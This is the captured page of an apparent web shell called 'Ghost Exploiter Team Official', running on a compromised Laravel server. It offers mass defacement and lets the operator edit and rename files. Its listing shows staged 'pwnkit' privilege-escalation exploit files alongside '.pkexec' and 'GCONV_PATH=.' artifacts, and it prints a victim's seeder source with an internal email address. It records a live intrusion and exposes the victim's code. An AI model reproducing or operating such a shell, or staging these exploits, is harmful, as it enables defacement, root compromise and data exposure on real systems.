Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
bootstrap
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
GCONV_PATH=.
--
ren
cache
--
ren
.htaccess
0KB
edt
ren
.mad-root
0KB
edt
ren
01KFX1CYAABDKCK27C2KDZB
...
0KB
edt
ren
ResponseDto.php
0KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
TokenResponse.php
0KB
edt
ren
api.php
0KB
edt
ren
app.php
4.229KB
edt
ren
auth.php
3.935KB
edt
ren
cache.php
0KB
edt
ren
console.php
0KB
edt
ren
contragents.php
0KB
edt
ren
payments.json
0KB
edt
ren
pwnkit
10.992KB
edt
ren
pwnkit-20260128040651.
10.992KB
edt
ren
pwnkit-20260128055902.
10.992KB
edt
ren
services.php
1.011KB
edt
ren
web.php
0KB
edt
ren
<?php declare(strict_types=1); namespace Database\Seeders; use App\Domain\Users\UserService; use App\Enums\RoleEnum; use App\Models\System; use App\Models\User; use Illuminate\Database\Seeder; final class RoleTableSeeder extends Seeder { /** * Run the database seeds. */ public function run(): void { /** * @var UserService $service */ $service = app()->make(UserService::class); $roles = [ //'admin', // Супер-пользователь RoleEnum::ACCOUNTANT, // Бухгалтер RoleEnum::MODERATOR, // Согласование RoleEnum::COLLABORATOR // Сотрудник ]; $users = User::query()->where('email', '!=', 'replay@top-it.ru')->get(); $models = System::query()->get(); foreach ($users as $index => $user) { $role = $roles[$index % count($roles)]; foreach ($models as $model) { $service->assignRole($user, $role, $model->id); } } } }
<=Back
Liking